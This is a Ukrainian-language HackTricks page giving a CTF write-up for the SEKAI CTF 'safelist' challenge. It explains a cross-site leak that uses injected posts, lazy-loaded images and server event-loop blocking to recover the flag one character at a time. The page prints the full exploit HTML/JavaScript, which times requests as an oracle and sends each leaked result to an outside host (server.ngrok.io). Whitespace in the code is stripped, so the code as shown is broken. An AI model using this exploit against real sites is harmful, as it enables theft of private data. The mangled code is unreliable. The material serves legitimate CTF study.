Ви працюєте в кібербезпеці компанії? Хочете побачити рекламу вашої компанії на HackTricks? або хочете мати доступ до останньої версії PEASS або завантажити HackTricks у форматі PDF? Перевірте ПЛАНИ ПІДПИСКИ!
Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
У цьому експлоіті, @aszx87410 поєднує техніку лінивого завантаження зображень через впровадження HTML з видом блокування подій циклу для витоку символів.
Це інший експлоіт для завдання CTF, про яке вже було згадано на наступній сторінці. Перегляньте для отримання додаткової інформації про виклик:
Атакуючий може впровадитипост, що починається з "A", потім деякий HTML тег (наприклад великий <canvas) заповнить більшу частину екрану і деякі кінцеві теги <img lazy, щоб завантажити речі.
Якщо замість "A" атакуючий впроваджує той самий пост, але починається з "z". Пост з прапорцем з'явиться першим, потім впроваджений пост з'явиться з початковим "z" і великимканвасом. Оскільки пост з прапорцем з'явився першим, перший канвас займе весь екран, і кінцеві теги <img lazy, впроваджені не будуть видно на екрані, тому вони не будуть завантажені.
Потім, поки бот отримує доступ до сторінки, атакуючий буде надсилати запити fetch.
Якщо зображення, впроваджені в пост, завантажуються, ці запити fetch займуть більше часу, тому атакуючий знає, що пост знаходиться перед прапорцем (в алфавітному порядку).
Якщо запити fetch виконуються швидко, це означає, що пост знаходиться в алфавітному порядку після прапорця.
Давайте перевіримо код:
<!DOCTYPEhtml><html><!--The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop.
If images are loading, the request to "/" is slower, otherwise faster.By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.We can use fetch to measure the request time.--><body><buttononclick="run()">start</button><!-- Inject post with payload --><formid=faction="http://localhost:1234/create"method="POST"target="_blank"><inputid=inpname="text"value=""></form><!-- Remove index --><formid=f2action="http://localhost:1234/remove"method="POST"target="_blank"><inputid=inp2name="index"value=""></form><script>let flag ='SEKAI{'constTARGET='https://safelist.ctf.sekai.team'f.action =TARGET+'/create'f2.action =TARGET+'/remove'constsleep= ms =>newPromise(r =>setTimeout(r, ms))// Function to leak info to attackerconstsend= data =>fetch('http://server.ngrok.io?d='+data)constcharset='abcdefghijklmnopqrstuvwxyz'.split('')// start exploitlet count =0setTimeout(async () => {letL=0letR=charset.length-1// I have omited code here as apparently it wasn't necesary// fallback to linerar since I am not familiar with binary search lolfor(let i=R; i>=L; i--) {let c = charset[i]send('try_'+ flag + c)constfound=awaittestChar(flag + c)if (found) {send('found: '+ flag+c)flag += cbreak}}},0)asyncfunctiontestChar(str) {returnnewPromise(resolve => {/*For 3350, you need to test it on your local to get this number.The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
If starts with "A", the image should be loaded because it's in the threshold.*/// <canvas height="3350px"> is experimental and allow to show the injected// images when the post injected is the first one but to hide them when// the injected post is after the post with the flaginp.value = str + '<br><canvas height="3350px"></canvas><br>'+Array.from({length:20}).map((_,i)=>`<img loading=lazy src=/?${i}>`).join('')
f.submit()setTimeout(() => {run(str, resolve)},500)})}asyncfunctionrun(str, resolve) {// Open posts page 5 timesfor(let i=1; i<=5;i++) {window.open(TARGET)}let t =0constround=30//Lets time 30 requestssetTimeout(async () => {// Send 30 requests and time eachfor(let i=0; i<round; i++) {let s =performance.now()awaitfetch(TARGET+'/?test', {mode:'no-cors'}).catch(err=>1)let end =performance.now()t += end - sconsole.log(end - s)}constavg= t/round// Send info about how much time it tooksend(str +","+ t +","+"avg:"+ avg)/*I get this threshold(1000ms) by trying multiple times on remote admin botfor example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold*/constisFound= (t >=1000)if (isFound) {inp2.value ="0"} else {inp2.value ="1"}// remember to delete the post to not break our leak oraclef2.submit()setTimeout(() => {resolve(isFound)},200)},200)}</script></body></html>
Чи працюєте ви в кібербезпеці компанії? Хочете, щоб ваша компанія рекламувалася на HackTricks? або хочете мати доступ до останньої версії PEASS або завантажити HackTricks у форматі PDF? Перевірте ПЛАНИ ПІДПИСКИ!